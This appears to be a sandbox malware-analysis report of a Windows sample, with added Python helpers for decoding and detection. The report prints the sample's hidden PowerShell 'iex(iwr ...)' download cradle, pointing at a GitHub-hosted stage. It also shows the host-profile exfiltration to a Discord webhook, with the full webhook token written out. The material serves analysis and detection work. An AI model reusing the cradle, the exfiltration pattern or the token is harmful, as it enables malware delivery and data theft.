2024-10-15 13:55:05 UTC | 1378 | IN | Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 13:55:05 UTC | 1378 | IN | Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 13:55:05 UTC | 1378 | IN | Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 13:55:05 UTC | 1378 | IN | Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
Data Ascii:
cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

# Retrieve GPU information
$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 13:55:05 UTC | 618 | IN | Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
Data Ascii:
======================
"@
} | ConvertTo-Json

# Send the POST request to the webhook URL
try {
    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
    Write-Output "Message sent successfully."
} catch {
    W
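The long decimal lists in the gaber.txt payload are the bytes of the shortcut that the script writes to `C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk`, and the shortcut's UTF-16LE strings are visible in them: one fragment spells `forfiles.exe`, another reads `allit iEx; sal $env:os iWr; calliT(WINDOWS_NT p`. That second fragment explains the pastebin stage: `sal` is the default alias of Set-Alias, `$env:OS` expands to `Windows_NT` on any Windows NT host, so `WINDOWS_NT` becomes an alias for `iwr` (Invoke-WebRequest); the leading `allit iEx;` is the tail of a second definition that the capture cuts off, consistent with `calliT` aliasing `iex` (Invoke-Expression), but the page does not show that definition in full. The following is an added example for this report, not sample or Joe Sandbox code. It decodes a decimal byte list as UTF-16LE, trying both byte alignments because the fragment starts mid-character, collects the `sal` definitions it actually contains, and rewrites the session 5 line with them; the `$env:OS` value is supplied by us, the three built-in alias names are PowerShell defaults, and the truncated definition is deliberately not guessed.

```python
"""Decode the .lnk byte list and resolve the Set-Alias trick (added example, not sandbox or sample code)."""
import re

# Copied verbatim from the session 6 "Data Ascii" lines and the session 5 script line.
LNK_FRAGMENT = (
    ",0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,"
    "110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,"
    "87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,"
)
PASTEBIN_STAGE = ('calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"'
                  '+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)')

# PowerShell default aliases the recovered text relies on.
BUILTIN_ALIASES = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest", "sal": "Set-Alias"}
# Assumed environment of the victim: $env:OS is "Windows_NT" on every Windows NT system.
VICTIM_ENV = {"os": "Windows_NT"}


def decode_utf16le_fragment(fragment: str) -> str:
    """Turn a comma-separated decimal byte list into text.

    The fragment may start mid-character, so both byte alignments are tried and the one
    yielding more printable ASCII wins; a trailing odd byte is zero-padded.
    """
    values = [int(v) for v in fragment.strip(",").split(",") if v.strip()]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("not a byte list")
    best, best_score = "", -1
    for offset in (0, 1):
        data = bytes(values[offset:])
        if len(data) % 2:
            data += b"\x00"
        text = data.decode("utf-16-le", errors="replace")
        score = sum(32 <= ord(ch) < 127 for ch in text)
        if score > best_score:
            best, best_score = text, score
    return best


_SAL = re.compile(r"\bsal\s+(\S+)\s+([^\s;]+)", re.IGNORECASE)


def extract_aliases(script: str, env: dict) -> dict:
    """Collect `sal <name> <target>` definitions; a $env:VAR alias name is expanded from `env`."""
    aliases = {}
    for name, target in _SAL.findall(script):
        m = re.fullmatch(r"\$env:(\w+)", name, re.IGNORECASE)
        if m:
            name = env.get(m.group(1).lower(), name)
        aliases[name.lower()] = BUILTIN_ALIASES.get(target.lower(), target)
    return aliases


def resolve_aliases(script: str, aliases: dict) -> str:
    """Rewrite identifiers that are known aliases to their canonical cmdlet names (case-insensitive)."""
    return re.sub(r"[A-Za-z_]\w*", lambda m: aliases.get(m.group(0).lower(), m.group(0)), script)


def deobfuscate() -> dict:
    text = decode_utf16le_fragment(LNK_FRAGMENT)
    aliases = extract_aliases(text, VICTIM_ENV)
    return {"text": text, "aliases": aliases, "resolved": resolve_aliases(PASTEBIN_STAGE, aliases)}


if __name__ == "__main__":
    for key, value in deobfuscate().items():
        print(f"{key}: {value}")
```

Only the definition that survives in the capture is applied, so `calliT` stays as it is in the rewritten line; a longer capture of the same .lnk would let `extract_aliases` pick up the rest without any change to the code.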


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.3 | 62871 | 162.159.138.232 | 443 | 4116 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:55:12 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 297
                                                                                                Connection: Keep-Alive
2024-10-15 13:55:12 UTC | 297 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 61 72 64 7a 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 5f 44 45 45 43 5a 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
Data Ascii:
{
    "content":  "================================\n**user** system online\n\n**GPU:** _DEECZG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
2024-10-15 13:55:12 UTC | 1362 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Tue, 15 Oct 2024 13:55:12 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Connection: close
                                                                                                set-cookie: __dcfduid=195d74288afd11ef9fd81aa1ab2748bc; Expires=Sun, 14-Oct-2029 13:55:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000514
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGfktjXYcBG3L%2FL6%2BJ7kz%2FPH%2BpPer7x7rK7BwiZR95Cawko7w0kGPHX3tajyNp3aVNNdjEMj6aVEtDsEQrpXf3i9DGKf7elRLUqlWzU0sh%2F%2Bv4IMy6wXPW6ZtJD%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: __sdcfduid=195d74288afd11ef9fd81aa1ab2748bcbd98d7a368cedca82998c609e5b314deaa9553717ccd53de5fea6b77dcc88e22; Expires=Sun, 14-Oct-2029 13:55:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                Set-Cookie: __cfruid=1832e94ac9fcee6a06a04187ed6d7c37afc16f68-1729000512; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-15 13:55:12 UTC | 211 | IN | Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 68 51 59 56 73 5a 36 35 54 35 77 79 6b 38 43 55 6f 33 52 44 41 2e 42 6b 48 65 4b 2e 77 32 2e 57 39 68 42 6c 32 46 5f 5f 65 38 4d 2d 31 37 32 39 30 30 30 35 31 32 38 38 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 65 33 33 65 39 33 61 34 36 39 30 2d 44 46 57 0d 0a 0d 0a
Data Ascii:
Set-Cookie: _cfuvid=hQYVsZ65T5wyk8CUo3RDA.BkHeK.w2.W9hBl2F__e8M-1729000512888-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d304e33e93a4690-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.3 | 62872 | 162.159.138.232 | 443 | 7688 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:55:18 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 297
                                                                                                Connection: Keep-Alive
2024-10-15 13:55:18 UTC | 297 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 61 72 64 7a 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 5f 44 45 45 43 5a 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
Data Ascii:
{
    "content":  "================================\n**user** system online\n\n**GPU:** _DEECZG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
2024-10-15 13:55:18 UTC | 1257 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Tue, 15 Oct 2024 13:55:18 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 45
                                                                                                Connection: close
                                                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000520
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JUs1QElVF70VthSakJsafJd6%2Bo3mCuroQWk81tyvnvn9PPhLNUkwtJLtsikOZ11fRurFumyk%2FqU3Ux0zOzsxl6HAJNzraythxH%2Bb5y6COTvV2preqRk%2F3GmCQxc"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Set-Cookie: __cfruid=760c3f7f9a8f6b9971b915706863cede5079f7ea-1729000518; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: _cfuvid=cSsEV_42yE8w9zOR.P2k92ne3S_DUmteHnQ3wLl0CcU-1729000518872-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304e5a3a3e4656-DFW
2024-10-15 13:55:18 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
Data Ascii: {"message": "Unknown Webhook", "code": 10015}
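Sessions 5 to 8 are the whole chain seen from the network: two stage downloads from paste-style hosts with the WindowsPowerShell User-Agent, then the collected host profile posted to a Discord webhook, accepted with 204 at 13:55:12 and rejected six seconds later with 404 "Unknown Webhook" (code 10015). One caveat when reading these sessions: the rendered Data Ascii shows `**user** system online`, while the raw bytes at that offset are `2a 2a 68 61 72 64 7a 2a 2a` (`**hardz**`), so take exfiltrated values from Data Raw when the exact string matters. The following is an added example for this report, not Joe Sandbox code and not part of the sample: a small triage pass over request records transcribed from the four sessions (the `HttpRequest` record and the rules are ours), which flags the cradle and the webhook post and redacts the webhook token, since the full token in the path is a usable credential.

```python
"""Flag the download cradle and the Discord webhook exfil in sessions 5 to 8 (added example, not sandbox or sample code)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Transcribed from the report: the User-Agent all four requests carried and the webhook path.
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031"
WEBHOOK = "/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2"


@dataclass(frozen=True)
class HttpRequest:
    session: int
    method: str
    host: str
    path: str
    user_agent: str
    status: Optional[int]  # response status if one was captured


SESSIONS = [
    HttpRequest(5, "GET", "pastebin.com", "/raw/sA04Mwk2", PS_UA, 200),
    HttpRequest(6, "GET", "raw.githubusercontent.com",
                "/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt", PS_UA, 200),
    HttpRequest(7, "POST", "discord.com", WEBHOOK, PS_UA, 204),
    HttpRequest(8, "POST", "discord.com", WEBHOOK, PS_UA, 404),
]

# Hosts this chain pulls its next stage from; extend for your own environment.
PASTE_HOSTS = {"pastebin.com", "raw.githubusercontent.com"}
_WEBHOOK_PATH = re.compile(r"^/api/webhooks/(\d+)/([A-Za-z0-9_-]+)$")


def redact_token(token: str) -> str:
    """Keep a few characters for correlation between reports; the full token is a live credential."""
    return f"{token[:4]}...{token[-4:]}" if len(token) > 12 else "***"


def classify(req: HttpRequest) -> List[str]:
    findings = []
    from_powershell = "WindowsPowerShell/" in req.user_agent
    if from_powershell and req.method == "GET" and req.host in PASTE_HOSTS:
        findings.append(f"download cradle: PowerShell fetched {req.host}{req.path}")
    m = _WEBHOOK_PATH.match(req.path) if (req.host == "discord.com" and req.method == "POST") else None
    if m:
        webhook_id, token = m.groups()
        # 204 means Discord accepted the message; 404/10015 means the webhook no longer exists.
        state = {204: "accepted", 404: "unknown or deleted webhook"}.get(req.status, f"HTTP {req.status}")
        findings.append(f"discord webhook post: id={webhook_id} token={redact_token(token)} ({state})")
    return findings


def triage(requests) -> dict:
    """Map session id to the findings for that request."""
    return {r.session: classify(r) for r in requests}


if __name__ == "__main__":
    for session, findings in triage(SESSIONS).items():
        print(session, findings or "-")
```

The same two rules carry over to proxy or Suricata HTTP logs: a `WindowsPowerShell/` User-Agent fetching from a paste or raw-code host, and any POST to `discord.com/api/webhooks/` from a non-browser client, are each worth an alert on their own.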


                                                                                                Target ID:0
                                                                                                Start time:09:54:05
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Users\user\Desktop\Lm9IJ4r9oO.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Lm9IJ4r9oO.exe"
                                                                                                Imagebase:0x670000
                                                                                                File size:199'168 bytes
                                                                                                MD5 hash:032BC4FB50A2D4FC55727D99248B29B2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:09:54:06
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'
                                                                                                Imagebase:0x8b0000
                                                                                                File size:457'216 bytes
                                                                                                MD5 hash:3F92A35BA26FF7A11A49E15EFE18F0C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true
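The Target ID 2 command line is the whole first stage in one line: the sample launches PowerShell with `-WindowStyle Hidden`, and that instance uses `start` (the Start-Process alias) to spawn a second hidden PowerShell whose `-args` value is the `iex(iwr ...)` cradle for `cr_asm_menu.txt`. Both `-windowstyle h` and `-args` work because PowerShell resolves any unambiguous parameter-name prefix, and the value `h` is resolved against `Hidden` the same way, which is why the Sigma rules for parameter substrings and download cradles fire. The following is an added example for this report, not Joe Sandbox code or a Sigma rule: it scores a command line on those three traits (hidden window including abbreviated forms, nested PowerShell launch, expression-execution plus fetch) and extracts the URLs. SAMPLE_CMDLINE is the report's Target ID 2 command line; BENIGN_CMDLINE is a constructed contrast case.

```python
"""Score a PowerShell command line for the hidden nested download cradle seen in Target ID 2 (added example)."""
import re

# From the report (Target ID 2) and a constructed benign line for contrast.
SAMPLE_CMDLINE = ("powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args "
                  "'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'")
BENIGN_CMDLINE = "powershell -NoProfile -Command Get-Process | Sort-Object CPU"

_IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
_FETCH = re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
_NESTED = re.compile(r"\bstart(?:-process)?\s+powershell\b", re.IGNORECASE)


def hidden_window(cmdline: str) -> bool:
    """True if a parameter that is a prefix of -WindowStyle takes a value that is a prefix of Hidden.

    Covers -WindowStyle Hidden, -windowstyle h, -w hid and every form in between, for both
    powershell.exe and Start-Process, since both resolve unambiguous prefixes.
    """
    tokens = cmdline.replace("'", " ").replace('"', " ").split()
    for tok, nxt in zip(tokens, tokens[1:]):
        if (tok.startswith("-") and len(tok) > 1
                and "windowstyle".startswith(tok[1:].lower())
                and "hidden".startswith(nxt.lower())):
            return True
    return False


def analyze_cmdline(cmdline: str) -> dict:
    return {
        "hidden_window": hidden_window(cmdline),
        "nested_powershell": bool(_NESTED.search(cmdline)) and cmdline.lower().count("powershell") >= 2,
        "download_cradle": bool(_IEX.search(cmdline) and _FETCH.search(cmdline)),
        "urls": _URL.findall(cmdline),
    }


def score(cmdline: str) -> int:
    """Number of traits present, 0 to 4; anything at 2 or above deserves a look."""
    r = analyze_cmdline(cmdline)
    return sum([r["hidden_window"], r["nested_powershell"], r["download_cradle"], bool(r["urls"])])


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(score(line), analyze_cmdline(line))
```

Run this over Sysmon event 1 or Security 4688 command lines; the prefix matching in `hidden_window` is what keeps `-w h` from slipping past a rule that only looks for the literal `-WindowStyle Hidden`.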

                                                                                                Target ID:3
                                                                                                Start time:09:54:06
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff720030000
                                                                                                File size:873'472 bytes
                                                                                                MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:09:54:08
                                                                                                Start date:15/10/2024
